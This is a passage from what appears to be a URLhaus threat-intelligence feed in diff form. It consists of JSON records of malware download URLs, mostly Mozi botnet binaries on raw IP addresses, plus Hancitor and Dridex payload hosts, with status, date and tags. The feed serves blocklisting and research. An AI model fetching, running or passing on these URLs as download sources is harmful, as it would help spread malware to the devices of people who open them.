listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961254","urlhaus_reference":"https://urlhaus.abuse.ch/url/961254/","url":"http://190.140.131.14:44987/Mozi.m","url_status":"online","host":"190.140.131.14","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961249","urlhaus_reference":"https://urlhaus.abuse.ch/url/961249/","url":"http://125.43.33.108:44681/Mozi.m","url_status":"online","host":"125.43.33.108","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961250","urlhaus_reference":"https://urlhaus.abuse.ch/url/961250/","url":"http://123.14.65.211:58391/Mozi.m","url_status":"online","host":"123.14.65.211","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961248","urlhaus_reference":"https://urlhaus.abuse.ch/url/961248/","url":"http://117.194.164.34:48540/Mozi.a","url_status":"offline","host":"117.194.164.34","date_added":"2021-01-14 19:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961246","urlhaus_reference":"https://urlhaus.abuse.ch/url/961246/","url":"http://115.48.13.187:42755/Mozi.m","url_status":"online","host":"115.48.13.187","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961247","urlhaus_reference":"https://urlhaus.abuse.ch/url/961247/","url":"http://113.87.249.28:52688/Mozi.m","url_status":"online","host":"113.87.249.28","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961244","urlhaus_reference":"https://urlhaus.abuse.ch/url/961244/","url":"http://112.30.110.63:33782/Mozi.m","url_status":"online","host":"112.30.110.63","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961245","urlhaus_reference":"https://urlhaus.abuse.ch/url/961245/","url":"http://113.133.225.154:50381/Mozi.m","url_status":"online","host":"113.133.225.154","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961243","urlhaus_reference":"https://urlhaus.abuse.ch/url/961243/","url":"http://123.14.154.78:44219/Mozi.m","url_status":"online","host":"123.14.154.78","date_added":"2021-01-14 19:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961242","urlhaus_reference":"https://urlhaus.abuse.ch/url/961242/","url":"http://61.53.42.182:36619/bin.sh","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:01:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961241","urlhaus_reference":"https://urlhaus.abuse.ch/url/961241/","url":"http://115.58.166.75:59976/i","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:56:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961239","urlhaus_reference":"https://urlhaus.abuse.ch/url/961239/","url":"http://59.92.217.228:48688/Mozi.a","url_status":"online","host":"59.92.217.228","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961240","urlhaus_reference":"https://urlhaus.abuse.ch/url/961240/","url":"http://221.145.179.219:45682/Mozi.m","url_status":"online","host":"221.145.179.219","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961238","urlhaus_reference":"https://urlhaus.abuse.ch/url/961238/","url":"http://59.99.136.49:34922/Mozi.m","url_status":"offline","host":"59.99.136.49","date_added":"2021-01-14 18:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961233","urlhaus_reference":"https://urlhaus.abuse.ch/url/961233/","url":"http://92.54.237.196:37489/Mozi.m","url_status":"online","host":"92.54.237.196","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961234","urlhaus_reference":"https://urlhaus.abuse.ch/url/961234/","url":"http://186.33.104.184:51940/Mozi.m","url_status":"online","host":"186.33.104.184","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961235","urlhaus_reference":"https://urlhaus.abuse.ch/url/961235/","url":"http://59.99.40.58:49599/Mozi.a","url_status":"offline","host":"59.99.40.58","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961236","urlhaus_reference":"https://urlhaus.abuse.ch/url/961236/","url":"http://59.99.92.249:53436/Mozi.m","url_status":"offline","host":"59.99.92.249","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961237","urlhaus_reference":"https://urlhaus.abuse.ch/url/961237/","url":"http://58.249.11.35:57237/Mozi.a","url_status":"online","host":"58.249.11.35","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961232","urlhaus_reference":"https://urlhaus.abuse.ch/url/961232/","url":"http://42.224.251.45:50907/Mozi.m","url_status":"online","host":"42.224.251.45","date_added":"2021-01-14 18:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961231","urlhaus_reference":"https://urlhaus.abuse.ch/url/961231/","url":"http://117.208.134.248:41910/Mozi.m","url_status":"online","host":"117.208.134.248","date_added":"2021-01-14 18:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961229","urlhaus_reference":"https://urlhaus.abuse.ch/url/961229/","url":"http://115.55.93.86:57217/Mozi.m","url_status":"online","host":"115.55.93.86","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961230","urlhaus_reference":"https://urlhaus.abuse.ch/url/961230/","url":"http://117.196.50.105:47632/Mozi.m","url_status":"online","host":"117.196.50.105","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961227","urlhaus_reference":"https://urlhaus.abuse.ch/url/961227/","url":"http://116.75.197.63:46654/Mozi.a","url_status":"online","host":"116.75.197.63","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961228","urlhaus_reference":"https://urlhaus.abuse.ch/url/961228/","url":"http://115.55.33.224:59073/Mozi.m","url_status":"online","host":"115.55.33.224","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961221","urlhaus_reference":"https://urlhaus.abuse.ch/url/961221/","url":"http://116.75.192.61:37958/Mozi.a","url_status":"offline","host":"116.75.192.61","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961222","urlhaus_reference":"https://urlhaus.abuse.ch/url/961222/","url":"http://119.178.250.25:53943/Mozi.m","url_status":"online","host":"119.178.250.25","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961223","urlhaus_reference":"https://urlhaus.abuse.ch/url/961223/","url":"http://115.59.212.117:40404/Mozi.m","url_status":"online","host":"115.59.212.117","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961224","urlhaus_reference":"https://urlhaus.abuse.ch/url/961224/","url":"http://182.114.210.156:46738/Mozi.m","url_status":"online","host":"182.114.210.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961225","urlhaus_reference":"https://urlhaus.abuse.ch/url/961225/","url":"http://123.12.231.116:58234/Mozi.m","url_status":"online","host":"123.12.231.116","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961226","urlhaus_reference":"https://urlhaus.abuse.ch/url/961226/","url":"http://182.59.230.66:36911/Mozi.a","url_status":"online","host":"182.59.230.66","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961220","urlhaus_reference":"https://urlhaus.abuse.ch/url/961220/","url":"http://115.207.21.23:35028/Mozi.m","url_status":"online","host":"115.207.21.23","date_added":"2021-01-14 18:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961219","urlhaus_reference":"https://urlhaus.abuse.ch/url/961219/","url":"http://allanabolicsteam.net/nedfr_.exe","url_status":"offline","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]} +{"id":"961217","urlhaus_reference":"https://urlhaus.abuse.ch/url/961217/","url":"https://intranetstc.micromart.com.br/fined.php","url_status":"offline","host":"intranetstc.micromart.com.br","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"0x49736b","larted":"false","tags":["Dridex"]} +{"id":"961218","urlhaus_reference":"https://urlhaus.abuse.ch/url/961218/","url":"http://allanabolicsteam.net/1301s.bin","url_status":"online","host":"allanabolicsteam.net","date_added":"2021-01-14 18:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"Myrtus0x0","larted":"true","tags":["c2","hancitor","payload"]} +{"id":"961216","urlhaus_reference":"https://urlhaus.abuse.ch/url/961216/","url":"http://61.53.222.100:43741/i","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:44:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961215","urlhaus_reference":"https://urlhaus.abuse.ch/url/961215/","url":"http://42.225.52.44:45803/bin.sh","url_status":"offline","host":"42.225.52.44","date_added":"2021-01-14 18:41:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"false","tags":["32-bit","elf","mips"]} +{"id":"961214","urlhaus_reference":"https://urlhaus.abuse.ch/url/961214/","url":"http://191.242.38.33:38611/Mozi.m","url_status":"offline","host":"191.242.38.33","date_added":"2021-01-14 18:36:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961213","urlhaus_reference":"https://urlhaus.abuse.ch/url/961213/","url":"http://59.97.171.225:35185/Mozi.m","url_status":"offline","host":"59.97.171.225","date_added":"2021-01-14 18:36:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961212","urlhaus_reference":"https://urlhaus.abuse.ch/url/961212/","url":"http://189.51.102.115:35054/Mozi.m","url_status":"offline","host":"189.51.102.115","date_added":"2021-01-14 18:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961207","urlhaus_reference":"https://urlhaus.abuse.ch/url/961207/","url":"http://42.235.186.115:60038/Mozi.m","url_status":"online","host":"42.235.186.115","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961208","urlhaus_reference":"https://urlhaus.abuse.ch/url/961208/","url":"http://219.157.134.199:52253/Mozi.m","url_status":"online","host":"219.157.134.199","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961209","urlhaus_reference":"https://urlhaus.abuse.ch/url/961209/","url":"http://221.14.21.135:43125/Mozi.m","url_status":"online","host":"221.14.21.135","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961210","urlhaus_reference":"https://urlhaus.abuse.ch/url/961210/","url":"http://58.248.118.230:52650/Mozi.a","url_status":"online","host":"58.248.118.230","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961211","urlhaus_reference":"https://urlhaus.abuse.ch/url/961211/","url":"http://219.155.30.125:59273/Mozi.m","url_status":"online","host":"219.155.30.125","date_added":"2021-01-14 18:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961206","urlhaus_reference":"https://urlhaus.abuse.ch/url/961206/","url":"http://121.159.74.78:40346/Mozi.m","url_status":"online","host":"121.159.74.78","date_added":"2021-01-14 18:35:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961204","urlhaus_reference":"https://urlhaus.abuse.ch/url/961204/","url":"http://179.227.77.63:44242/Mozi.m","url_status":"offline","host":"179.227.77.63","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961205","urlhaus_reference":"https://urlhaus.abuse.ch/url/961205/","url":"http://117.194.167.179:40624/Mozi.m","url_status":"offline","host":"117.194.167.179","date_added":"2021-01-14 18:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961202","urlhaus_reference":"https://urlhaus.abuse.ch/url/961202/","url":"http://123.9.103.67:41245/Mozi.m","url_status":"online","host":"123.9.103.67","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961203","urlhaus_reference":"https://urlhaus.abuse.ch/url/961203/","url":"http://182.116.67.218:48866/Mozi.m","url_status":"online","host":"182.116.67.218","date_added":"2021-01-14 18:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961198","urlhaus_reference":"https://urlhaus.abuse.ch/url/961198/","url":"http://125.41.142.109:58258/Mozi.m","url_status":"online","host":"125.41.142.109","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961199","urlhaus_reference":"https://urlhaus.abuse.ch/url/961199/","url":"http://123.9.243.249:34516/Mozi.m","url_status":"online","host":"123.9.243.249","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961200","urlhaus_reference":"https://urlhaus.abuse.ch/url/961200/","url":"http://120.85.171.199:47851/Mozi.m","url_status":"online","host":"120.85.171.199","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961201","urlhaus_reference":"https://urlhaus.abuse.ch/url/961201/","url":"http://186.33.122.79:49226/Mozi.m","url_status":"online","host":"186.33.122.79","date_added":"2021-01-14 18:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961197","urlhaus_reference":"https://urlhaus.abuse.ch/url/961197/","url":"http://103.97.139.251:36957/bin.sh","url_status":"online","host":"103.97.139.251","date_added":"2021-01-14 18:34:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961196","urlhaus_reference":"https://urlhaus.abuse.ch/url/961196/","url":"http://115.54.114.20:53089/Mozi.m","url_status":"online","host":"115.54.114.20","date_added":"2021-01-14 18:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961193","urlhaus_reference":"https://urlhaus.abuse.ch/url/961193/","url":"http://103.161.49.76:57114/Mozi.m","url_status":"online","host":"103.161.49.76","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961194","urlhaus_reference":"https://urlhaus.abuse.ch/url/961194/","url":"http://115.56.159.83:33163/Mozi.a","url_status":"online","host":"115.56.159.83","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961195","urlhaus_reference":"https://urlhaus.abuse.ch/url/961195/","url":"http://115.56.181.246:48557/Mozi.m","url_status":"online","host":"115.56.181.246","date_added":"2021-01-14 18:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961192","urlhaus_reference":"https://urlhaus.abuse.ch/url/961192/","url":"http://115.58.166.75:59976/bin.sh","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:31:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961191","urlhaus_reference":"https://urlhaus.abuse.ch/url/961191/","url":"http://125.44.61.35:48291/i","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961190","urlhaus_reference":"https://urlhaus.abuse.ch/url/961190/","url":"http://42.230.84.239:45797/Mozi.m","url_status":"online","host":"42.230.84.239","date_added":"2021-01-14 18:21:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961186","urlhaus_reference":"https://urlhaus.abuse.ch/url/961186/","url":"http://61.53.222.100:43741/bin.sh","url_status":"online","host":"61.53.222.100","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961187","urlhaus_reference":"https://urlhaus.abuse.ch/url/961187/","url":"http://59.93.21.58:35446/Mozi.a","url_status":"offline","host":"59.93.21.58","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961188","urlhaus_reference":"https://urlhaus.abuse.ch/url/961188/","url":"http://59.88.231.198:35720/Mozi.m","url_status":"online","host":"59.88.231.198","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961189","urlhaus_reference":"https://urlhaus.abuse.ch/url/961189/","url":"http://59.96.37.115:50501/Mozi.m","url_status":"offline","host":"59.96.37.115","date_added":"2021-01-14 18:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961185","urlhaus_reference":"https://urlhaus.abuse.ch/url/961185/","url":"http://119.118.75.183:55796/Mozi.m","url_status":"online","host":"119.118.75.183","date_added":"2021-01-14 18:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961183","urlhaus_reference":"https://urlhaus.abuse.ch/url/961183/","url":"http://175.206.182.103:52308/Mozi.m","url_status":"online","host":"175.206.182.103","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961184","urlhaus_reference":"https://urlhaus.abuse.ch/url/961184/","url":"http://117.222.162.104:59154/Mozi.m","url_status":"offline","host":"117.222.162.104","date_added":"2021-01-14 18:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961177","urlhaus_reference":"https://urlhaus.abuse.ch/url/961177/","url":"http://122.188.192.87:57950/Mozi.m","url_status":"online","host":"122.188.192.87","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961178","urlhaus_reference":"https://urlhaus.abuse.ch/url/961178/","url":"http://222.141.8.40:33520/Mozi.m","url_status":"online","host":"222.141.8.40","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961179","urlhaus_reference":"https://urlhaus.abuse.ch/url/961179/","url":"http://123.14.202.127:45525/Mozi.m","url_status":"online","host":"123.14.202.127","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961180","urlhaus_reference":"https://urlhaus.abuse.ch/url/961180/","url":"http://41.86.21.38:38430/Mozi.m","url_status":"online","host":"41.86.21.38","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961181","urlhaus_reference":"https://urlhaus.abuse.ch/url/961181/","url":"http://220.125.119.207:4096/Mozi.m","url_status":"online","host":"220.125.119.207","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961182","urlhaus_reference":"https://urlhaus.abuse.ch/url/961182/","url":"http://121.150.209.136:50631/Mozi.a","url_status":"online","host":"121.150.209.136","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961176","urlhaus_reference":"https://urlhaus.abuse.ch/url/961176/","url":"http://186.33.122.85:37989/Mozi.m","url_status":"online","host":"186.33.122.85","date_added":"2021-01-14 18:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961175","urlhaus_reference":"https://urlhaus.abuse.ch/url/961175/","url":"http://219.157.253.54:54078/Mozi.m","url_status":"online","host":"219.157.253.54","date_added":"2021-01-14 18:20:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961173","urlhaus_reference":"https://urlhaus.abuse.ch/url/961173/","url":"http://219.154.108.170:34201/i","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961174","urlhaus_reference":"https://urlhaus.abuse.ch/url/961174/","url":"http://115.59.119.91:56573/Mozi.m","url_status":"online","host":"115.59.119.91","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961172","urlhaus_reference":"https://urlhaus.abuse.ch/url/961172/","url":"http://125.44.61.35:48291/bin.sh","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:08:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961170","urlhaus_reference":"https://urlhaus.abuse.ch/url/961170/","url":"http://59.92.217.195:60102/Mozi.m","url_status":"online","host":"59.92.217.195","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961171","urlhaus_reference":"https://urlhaus.abuse.ch/url/961171/","url":"http://59.92.183.181:52225/Mozi.m","url_status":"offline","host":"59.92.183.181","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961167","urlhaus_reference":"https://urlhaus.abuse.ch/url/961167/","url":"http://59.99.95.7:56733/Mozi.m","url_status":"offline","host":"59.99.95.7","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 